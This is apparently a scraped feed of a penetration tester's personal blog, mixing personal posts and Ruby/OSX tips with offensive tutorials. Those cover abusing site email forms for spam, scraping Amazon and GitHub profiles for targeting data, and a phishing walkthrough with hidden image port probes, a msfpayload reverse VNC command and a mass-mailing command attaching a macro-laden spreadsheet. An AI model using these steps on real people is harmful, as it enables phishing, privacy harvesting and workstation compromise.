My last day of this decade. Had an awesome time this past 10 years. I learned a lot of things, I graduated, got married, lived in several different places and cities, hacked many thing, read plenty of code jejejej, etc…

Wow, looking back is both short and so long. All that I prey is [...]]]> ~~English~~:

My last day of this decade. Had an awesome time this past 10 years. I learned a lot of things, I graduated, got married, lived in several different places and cities, hacked many thing, read plenty of code jejejej, etc…

Wow, looking back is both short and so long. All that I prey is to have lots of years ahead of me and even more challenges with lots of fun.

Thanks you all …

Most specially thanks to my lovely Vicky, our families and all those who were part of this GREAT journey.

MUCHAS GRACIAS….

~~Spanish~~:

Mi ultimo dia de esta decada. La verdad que tuve unos fantasticos 10 an~os. Aprendi muchas cosas nuevas, me gradue, me case, vivi en varios lugares en varias ciudades, hackie muchas cosas y lei mas que suficiente codigo ejejeje, etc …

Wow, mirando hacia atras se ve corto y tan largo a la vez. Todo lo que pido/rezo es poder tener muchos an~os mas y muchos desafios nuevos para pasarla bien.

Gracias a todos ..

Especialmente gracias a mi amada Vicky, a nuestras familias y a todos los que han sido parte de esta FANTASTICO viaje llamado vida.

THANKS A LOT ……

One of the issues while performing a social engineering / client-side attack is that if a smart administrator finds the emails are all coming from a single location it will just add a rule to the firewall or SMTP server to [...]]]> Looks like these past few week, I got some inspiration. So let’s abuse it.

One of the issues while performing a social engineering / client-side attack is that if a smart administrator finds the emails are all coming from a single location it will just add a rule to the firewall or SMTP server to not server/respond that IP.

Yes this is easily bypassable, using different IP addresses or even using several free services such as hotmail, gmail, yahoo, etc (All supported in EMaily http://www.github.com/FreedomCoder/emaily ) but what if we want to keep the attacks hidden and coming from one or more random sites or what if the SPAM filters are so good that it is just simply too difficult to send emails, but the client has a “recommend this site/page” on their web application and because the source IP is within the DMZ, the SPAM rules won’t apply those emails, etc…

It is worth noting from the beginning that if we do not have proper permissions to use the web application this is not the most recommended way to hide and attack from a legal perspective; nevertheless for those cases in which wedo have permissions there is a way to search for already available web applications that contained methods such as the ones that let you recommend a site/page and write a message ( i.e Google.com )

After looking through a few of the links shown above, we found that some of them are well programmed and only will let you put an email and name, but a lot of them after looking a little deeper, we found that a lot of them are just a POST or GET request form that lets you send an email to anyone with any subject, message and From/return-to address.

For example, the one show below lets you specify TO, FROM, body message and the “captcha” shown in the Figure it doesn’t really matter, since it is only checked on the browser, hence when we send a POST request we have no need to include it. Using this information, now we know that it can be easily automated to send hundred or millions of emails with a small message that maybe it will support HTML and if not it will most surely allow us to send a URL to a controllable site.

When we click on the “Recommend Now !” Button, it will create a simple POST request as it is shown below:

Now, how can we take full advantage of these freely available MAIL FORM services ? To my knowledge there is not a tool capable of using such forms on a uniform matter and send round of emails. It would be nice to have a small script capable of sending such emails rounds. After writing a few Proof of Concepts, I realized that EMaily was the right tool to do exactly that. It already has 90 % of the code implemented and I only need to add a few methods here and there and create some new options for the new “binary” emaily_web. Once I finish coding I should be able to send huge rounds of emails using something like the following commands:

So instead of using an email template in html format, we have to provide a file containing a POST or GET request like the one shown below, which contains the request to send an email but the special words used by emaily to generate each individual email(request).

Once we run the application it should generate an output like the one below stating each email and if it was successful or if it fail when sending it.
Output sample:

This it is now part of the EMaily 0.3 released in-sync with this post, so most of the already known emaily features still work.

Happy Hacking !!!

Looking [...]]]> Another weekend and another crawler. This time it is not emails, but nonetheless interesting data from a big gadget store.
Surfing through the site for gadgets, I found that Amazon has some interesting Profile data about it’s users such as location, date of birth, wish list, interested persons list,  reviews done to gadgets, etc …

Looking at the URL it was obvious that this could be automated to obtain most, if not the entire list of amazon users.  As it turns out a simple  Google search with

site:http://www.amazon.com/gp/pdp/profile/

Once I saw that, it was just a matter of writing a small script to harvest all the profiles out of Google and then parse each individual profile for useful information, as it is shown on the screenshot below where it is shows how simple is to gather information such as user location.

Once I had a proof of concept done. I started to think how could I use this data, besides the fact that is a simple info disclosure from the part of amazon.

As you might imagine I’m always on the hunt for new ways to improve ESearchy info gathering. I’ve reached a limit into how many emails or new persons I can easily get for free online. Because of these, lately, I have changed/expanded the searches from adding more persons to adding more detailed information about each individual target. First it was the profiling option on esearchy that searches within each users profile for other social networks, friends/co-workers, photos, or personal sites.

Having this now, I thought that we could expand the information to shopping information offered on the profiles, such as the wish list, the reviewed items –which is almost sure that they own such item–, etc ..

So what if we wanted to target each individual target, we could crawl the entire google results DB one and store that into an offline DB, and or look for a  way to search for individual persons from this results.  What if we take the persons name obtained from LinkedIn, Spoke, etc and add that to our Google Search parameter.

site:http://www.amazon.com/gp/pdp/profile/ Susan Emery

That will easily return only a few results for which we could use some kind of  partial regular expresion with percentage for completeness and take a huge leap into saying that both persons are the same and that those are the times that he/she wants.

So there it goes, more possible useful information that will allow us to generate even better and more targeted attacks against a particular person.

Happy Hacking

Proof of Concept Code:

Nowadays,  computers networks, are “”"”usually”"”" secure. Finding an exploitable remote network vulnerability is getting more [...]]]> General Information

…”our employees are responsable and security aware”….

…”They have admin access, because we trust them “….

….”I thought it was safe to open that file. Robert from IT sent it to me” …

….etc…

Nowadays,  computers networks, are “”"”usually”"”" secure. Finding an exploitable remote network vulnerability is getting more and more difficult. This is due to several reasons, such as operating system are safer, patching is slowly becoming a must  for all production applications, etc.

But, what about the corporate networks ? Do companies secure their networks the same way they do production servers? The answer is NO.  For thousands of motives, workstations are never kept up-to-date, nor properly setup.  In top of that, we have the end-users ( including IT admins), an amazing set of people that do amazing tasks, such as manage to infect their computer in less than two days, install all those crazy apps, and/or open all those links that have explicit DO NOT OPEN VIRUS FOUND.

Anyways, to make a story short, hackers, spammers, botnets, and all the “bad” guys are constnatly taken advantage of the ancient weakest link in all type of security; “The human factor“.   It does not matter how much you harden a computer, you can count on human ingenuity – …or should I say stupidity… — to find an unthinkable way to open and compromise their workstation.

In addition, nowadays, everybody wants to check their Facebook, LinkedIn, email, twitter, GMail. Basically,  it is human nature to be inform ( … gossip ).  Attackers know this and they count on people curiosity and need of information to craft their these types of attacks.

Client-side attacks, AKA social enginerring attacks,  social engineering penetration tests, basically the not so-new remote exploit trend.

It is worth noting that these type of attacks have existed for a long time, but now due to the tightness of security in networking on one hand and the expansion and rapid grow of social networks on the other hand; it has gained a lot of strength and  new types of attacks are appearing daily.

Types of attacks:

• emails
• websites
• Social networks ( Facebook, Orkut, twitter, Linkedin, … )
• Forums
• Physical ( pendrive, CD, phone, cellphones, ipods, ipads, etc )

Enough of  the BS talk let get dirty and talk about how to actually perform a client-side attack.

Info gathering Phase ( Reconnaissance )

Like in any other type of penetration test, we need to gather information.  The only difference here is that instead of looking for operating system and software versions and vulnerabilities we need to search information about the company, their employees, their social networks, etc.

I guess that when we are performing a test we would have some limitations with regards to privacy and employess private life, but the true is that a real attacks won’t have such limitations. So the simple rule is the more information you have the better. Everything is relevant information. Everything from sample company documents all they way down to what place some employee went to dinner last week and with whom.

Luckily for us, Mark Zuckerberg ( creator of Facebook ) has made our life much easier convincing people they are supposed to forget abour privacy and share as much information as they can with as much people as they can.

Depending on the type of attack we are performing, the type of data we will need, but most surely we will be needing  plenty of email accounts from the company being assess. There are many tools capable of performing OSINT ( Open Source Intelligence) theHarverster, Paterva’s Maltego, et and  of course ESearchy.

Esearchy is a small ruby library capable of searching the internet for email addresses and persons. Currently, the supported searching engines are, but not limited to:

• Search engines:
  • Google
  • Bing
  • Yahoo,
  • AltaVista
• Social Engines:
  • LinkedIn
  • Google Profiles
  • Naymz
  • Classmantes
  • Spoke
• Other Engines
  • PGP servers
  • Usenets
  • GoogleGroups Search
  • Spider
  • LDAP

In addition to that, ESearchy downloads several types of files and searches their contents for emails.

File types supported, but not limited to:

• PDF
• DOC
• DOCX
• XLSX
• PPTX
• ODT
• ODP
• ODS
• ODB
• ASN
• TXT

Installation:

$> sudo gem sources -a http://gems.github.com
$> sudo gem install gemcutter
$> sudo gem install esearchy

If you are installing it in backtrack follow the following how-to “Installing ESearchy on Backtrack 4.0”

The application supports several types of searches using the esearchy command and or you can create custom scripts using the esearchy library.  Using the tool is simple, for example:

$> esearchy -q @company.com –enable-gmail –enable-gpg
$> esearchy -q @company.com -c “Company Inc” –enable-people –profiling

After this we need to find information about the DNS servers, the mail servers and any other information that we usually do get as part of any penetration test.  A good tip, is to check the SMTP server for vulnerabilities such as information disclosures using VRFY, EXPN, etc …

Software and Physical network

Once we have a target list ( emails, names, etc .. ), We need to start performing an assessment on the network from within. One possible way of doing this is by sending one or more rounds of emails using specially crafted html templated emails consisting of several image tags pointing to different ports. and here is when a tool such as EMaily comes in.

Emaily is a command line tool created to send multiple templated emails using several servers at the same time. It contains many templates, but users can create their own templates and populate them as needed. It is worth noting that EMaily is also an expandable ruby library.

<img src="http://site:80/80.jpg?e=test@test.com style="display:none" />
<img src="http://site:8080/8080.jpg?e=test@test.com style=" display:none" />
<img src="http://site:443/443.jpg?e=test@test.com style="display:none" />
<img src="http://site:1080/1080.jpg?e=test@test.com style=" display:none" />
<img src="http://site:139/139.jpg?e=test@test.com style=" display:none" />
<img src="http://site:445/445.jpg?e=test@test.com style=" display:none" />

This can be automatically generated using EMaily template system as it is shown on the following code snipet, by simply using the %%payload[port 1, ... ,port n]%%

As we can see from the output generated by EMaily this will test egressing rules, obtain information such as operating system, email client used, IP addresses, etc…

Penetration Phase

Once we have obtained enough information about the company’s users and network infrastructure, it is time to concentrate all our efforts in attacking the company using all possible methods. There are many types of ways to compromise an end user. The most common methods are sending emails with certain types of attachments, such as pdf, Word, Excel, PowerPoint, executables, etc. Pretty much anything is possible and allowed.

VBA Attacks

One of the most commons methods to compromise a workstation is through a VBA payload. This is achieved using a word, excel or powerpoint file that contains a malicious script that will generate and execute, most commonly, a reverse shell. ( metasploit, Core Impact, custom built )

It is worth noting that when generating the payload we should use the open port information we got from our information gathering phase, so we are sure we can connect back to our MSF instance.

Sample Metasploit command to generate a reverse tcp vnc inject payload.

> msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.1 V > vbvnc.bas

Once we have the payload we need to add it to a file. Here is where the experience, artist skills come in handy. The more credible the file the higher the chances for an employee to open the document. Usually, it is recommended to search in google, bing, yahoo for documents made or related to the company in question. This docs, should contain information such as logos, speeches and other corporate standards, that will make the attack more credible.

First open the document in question and open the Visual Editor for macros.

After that copy the content of the first part of the .bas script into the editor, save and quit the macro.

The second part “the actual payload” should be stored in the end of the document, if we are using a MS Word document.

It is worth noting, that if we use the latest version of the MSF VBA attack  (3.4.x ) we will only be able to use it in  Microsoft Word, but with a couple changes, we should be able to add it to Excel as well.   Instead of using the payload as paragraphs we can paste then into the macro. Adding as a stream ( as it used to be done ) and or by  using  chr() method.

Once we have this setup Excel setup, it is time to use all the available emails and launch our first round of client-side attacks using EMaily again but this time we should use another template such as an internal email or something that would convince users to open the attached Excel sheet ( I leave that for later .. ).

For example if we want to send emails using servers 1,2,3,4 in blocks of 100 emails and we want to do it all at the same time ( Threaded) with a small scanports that would allow us to know who opened the email, we would have to execute the following command.

> emaily -S server1,server2,server4,server4 -b 100 -T --subject "Quaterly Report" -t templates/q_report.html -l ~/company_emails.csv -a ~/tmp/Q4_Financial_Report.xls --webserver --scanports 80,443

Well, now is time layback, get some mate with alfajores and wait until users start executing the excel payload and we get connection back. After that sky is the limit …. HACK the entire company ….

Happy Hacking !!!!

For example, let us take the default installed app bash

So I wanted to debug an application in order to see [...]]]> While doing some vulnerability research on some of the default OSX binary files, I run into the issue that a lot of the binaries are universal and contain i386, x86_64 and/or ppc.

For example, let us take the default installed app bash

So I wanted to debug an application in order to see where it was overflowing, but I only wanted to concentrate on the 32 bit architecture.  So I started wondering how could I force the application to run in 32 bit mode.  After some googleing and looking through the osx documentation. I found that there are a few commands just for that.

ARCH
This command will let you run an application on on one or more specific architectures.

For example if we want to run bash in 32bit:
$ arch -i386 /bin/bash

Now, what if we want to always use a binary in 386 mode. arch is not really helpful or what if we want another executable that only contained the i386 architecture code. Here is when lipo comes into play.

LIPO

This command will allow us to create a binary file containing only the desired architectures.
$ lipo -thin i386 /bin/bash -output /bin/bash.i386

Now if we we check the bash.i386 file it will only contain the 386 architecture binary information.

I guess this might be common knowledge to a lot of people, but It was really helpful for me and hopefully to anyone who was not yet aware of this two helpful commands.

Enjoy.

One of the things that Github discloses ( if provided ) is the email addresses.  Short of that, it also discloses information such as Full Name, website, Location, etc, as it is show on the image below.

Small proof of concept to crawl several emails using Google, ruby and some Sunday coding.

Taking advantage of this and the fact that it is stored on the  crawled page by Google it is really simple to search for Profile pages in github using a string close to the one shown:

site:github.com intitle:Profile

After that it is just a matter of retrieving each profile URL using a really simple regex like.

response.body.scan(/”http:\/\/github.com\/(.*)”/)

which should be followed by doing a get request of each and every profile.  It is relevant to mention that some emails address are encoded to prevent simple bots from crawling email addresses, but it is easily to bypass, since it is only encoded using a url-encoding method.

text.gsub!(/eval\(decodeURIComponent\(‘.*’\)\)/) { |a| CGI.unescape(a) }

Once we have the profile we can start gathering emails from the github.com site.  Even though this is just a simple proof of concept there are plenty of information that could be gathered to aid different types of social-engineering attacks.

Anyways, after a few minutes I had a really crapy and simple script that will crawl Google and find all Github.com Profiles in order to obtain all the disclosed email addresses.

( As I previously mentioned this could be expanded to harvest much more profile-able  data. )

Enjoy !

I’m currently working for IOActive. Last week while I was visiting headquarters. Our official initialization was performed: “After many beers, a Jagermeister shot, and many hot dogs; I became an [...]]]> Lately, a lot of things are changing in my life. A month and a half ago one of the things that changed  was “the job”.

I’m currently working for IOActive. Last week while I was visiting headquarters. Our official initialization was performed: “After many beers, a Jagermeister shot, and many hot dogs; I became an official IOActive P1r4t3″

Thanks for all the good times pimps and hoouuus !

$ sudo apt-get update
$ sudo apt-get upgrade
$ ruby -v
$ gem -v
# [...]]]> A lot of people told me that ESearchy was not working on backtrack 4.0. Here is a short how-to. Let me know if any of you run into other issues. So I can expand this how-to.

$ sudo apt-get update
$ sudo apt-get upgrade
$ ruby -v
$ gem -v
# 1.2 sudo
# this is OLD !!!
$ sudo gem install rubygems-update
$ sudo /var/lib/gems/1.8/bin/update_rubygems
#by default it will fail if you do not have installed libxslt-dev
sudo apt-get install libxslt-dev
# we need github gems
sudo gem sources --add http://gems.github.com
sudo gem install esearchy
# latest available version 2.0.7 ( if not 2.0.8 )

Whenever I do a new gem I try to test it on as [...]]]> As you might know, I’m always working on new projects to automate my work. Call me lazy, call me smart, but the true is that I actually enjoy programming, and if helps making my life easier, it is more than welcomed

Whenever I do a new gem I try to test it on as many platforms as I can.  OSX is the default development platform so usually they always work there, then I try on Gentoo, Fedora, Windows and Ubuntu.

I usually run into problems when I have to find where does Ubuntu saves the gem files and binaries. Yes, you will search pretty much everywhere but you won’t remember where the hell they are.

Since I got tired of searching every time I test something on an ubuntu VM, here is a short how-to so I won’t have to search next time.

Google Search: “can’t find gem executables in ubuntu”

or
$ sudo gem environment
RubyGems Environment:
- RUBYGEMS VERSION: 1.3.5
- RUBY VERSION: 1.8.7 (2009-06-12 patchlevel 174) [i486-linux]
- INSTALLATION DIRECTORY: /var/lib/gems/1.8
- RUBY EXECUTABLE: /usr/bin/ruby1.8
- EXECUTABLE DIRECTORY: /var/lib/gems/1.8/bin
- RUBYGEMS PLATFORMS:
- ruby
- x86-linux
- GEM PATHS:
- /var/lib/gems/1.8
- /home/USER/.gem/ruby/1.8
- GEM CONFIGURATION:
- :update_sources => true
- :verbose => true
- :benchmark => false
- :backtrace => false
- :bulk_threshold => 1000
- :sources => ["http://gems.rubyforge.org/", "http://gems.github.com"]
- REMOTE SOURCES:
- http://gems.rubyforge.org/
- http://gems.github.com


As it is shown above, my Ubuntu installation saves all installed gems in  ~/.gems or /var/lib/gems/1.8. Once you have the path, all you have to do is add them to your shell rc file.

In the case you use bash or zsh:

export PATH=$PATH:/var/lib/gems/1.8/bin

or, if you already have a PATH like i do just add it to the declaration

PATH=/usr/bin:......:/var/lib/gems/1.8/bin

re open your shell and EUREKA, all your gem’s executable are now in your path.

Here are a few updates.
* ESearchy-NG has a few new features. (Spoke [...]]]> Yes, today is my b-day. Hence I decided to add a few lines in this “kind of” forgotten blog.
Lately, I being doing plenty of interesting stuff, but haven’t had the time to sit and write about those things.

Here are a few updates.
* ESearchy-NG has a few new features. (Spoke being one of them)

* EMaily is almost finished. I have started testing and I’m looking for people willing to test this buggy version. (ohhh… EMaily is an automated companion tool to send client-side emails to hundred or thousands of people in different servers using customizable templates, etc. )

* Several other researches are on my table slowly developing into interesting tools or projects.

Enjoy